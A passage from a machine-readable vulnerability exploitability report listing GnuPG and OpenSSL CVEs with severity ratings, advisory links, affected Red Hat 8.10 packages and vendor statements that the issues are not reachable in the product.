          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        347
      ],
      "description": "In GnuPG through 2.4.8, if a signed message has \\f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an \"invalid armor\" message is printed during verification). This is related to use of \\f as a marker to denote truncation of a long plaintext line.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68972"
        },
        {
          "url": "https://github.com/advisories/GHSA-w789-3q45-984r"
        },
        {
          "url": "https://gpg.fail/formfeed"
        },
        {
          "url": "https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i"
        },
        {
          "url": "https://news.ycombinator.com/item?id=46404339"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
        }
      ],
      "published": "2025-12-27T23:15:40+00:00",
      "updated": "2026-06-17T09:59:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-69418",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        325
      ],
      "description": "Issue summary: When using the low-level OCB API directly with AES-NI or<br>other hardware-accelerated code paths, inputs whose length is not a multiple<br>of 16 bytes can leave the final partial block unencrypted and unauthenticated.<br><br>Impact summary: The trailing 1-15 bytes of a message may be exposed in<br>cleartext on encryption and are not covered by the authentication tag,<br>allowing an attacker to read or tamper with those bytes without detection.<br><br>The low-level OCB encrypt and decrypt routines in the hardware-accelerated<br>stream path process full 16-byte blocks but do not advance the input/output<br>pointers. The subsequent tail-handling code then operates on the original<br>base pointers, effectively reprocessing the beginning of the buffer while<br>leaving the actual trailing bytes unprocessed. The authentication checksum<br>also excludes the true tail bytes.<br><br>However, typical OpenSSL consumers using EVP are not affected because the<br>higher-level EVP and provider OCB implementations split inputs so that full<br>blocks and trailing partial blocks are processed in separate calls, avoiding<br>the problematic code path. Additionally, TLS does not use OCB ciphersuites.<br>The vulnerability only affects applications that call the low-level<br>CRYPTO_ocb128_encrypt() or CRYPTO_ocb128_decrypt() functions directly with<br>non-block-aligned lengths in a single call on hardware-accelerated builds.<br>For these reasons the issue was assessed as Low severity.<br><br>The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected<br>by this issue, as OCB mode is not a FIPS-approved algorithm.<br><br>OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.<br><br>OpenSSL 1.0.2 is not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-69418"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-69418"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-78qr-24v5-7q73"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/372fc5c77529695b05b4f5b5187691a57ef5dffc"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4016975d4469cd6b94927c607f7c511385f928d8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/52d23c86a54adab5ee9f80e48b242b52c4cc2347"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a7589230356d908c0eca4b969ec4f62106f4f5ae"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ed40856d7d4ba6cb42779b6770666a65f19cb977"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-69418.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69418"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69418"
        }
      ],
      "published": "2026-01-27T16:16:33+00:00",
      "updated": "2026-06-17T10:00:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-69420",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: A type confusion vulnerability exists in the TimeStamp Response\nverification code where an ASN1_TYPE union member is accessed without first\nvalidating the type, causing an invalid or NULL pointer dereference when\nprocessing a malformed TimeStamp Response file.\n\nImpact summary: An application calling TS_RESP_verify_response() with a\nmalformed TimeStamp Response can be caused to dereference an invalid or\nNULL pointer when reading, resulting in a Denial of Service.\n\nThe functions ossl_ess_get_signing_cert() and ossl_ess_get_signing_cert_v2()\naccess the signing cert attribute value without validating its type.\nWhen the type is not V_ASN1_SEQUENCE, this results in accessing invalid memory\nthrough the ASN1_TYPE union, causing a crash.\n\nExploiting this vulnerability requires an attacker to provide a malformed\nTimeStamp Response to an application that verifies timestamp responses. The\nTimeStamp protocol (RFC 3161) is not widely used and the impact of the\nexploit is just a Denial of Service. For these reasons the issue was\nassessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the TimeStamp Response implementation is outside the OpenSSL FIPS module\nboundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.\n\nOpenSSL 1.0.2 is not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-69420"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-69420"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-w42r-ph9f-9x66"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/27c7012c91cc986a598d7540f3079dfde2416eb9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4e254b48ad93cc092be3dd62d97015f33f73133a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/564fd9c73787f25693bf9e75faf7bf6bb1305d4e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5eb0770ffcf11b785cf374ff3c19196245e54f1b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a99349ebfc519999edc50620abe24d599b9eb085"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-69420.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69420"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69420"
        }
      ],
      "published": "2026-01-27T16:16:34+00:00",
      "updated": "2026-06-17T10:00:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
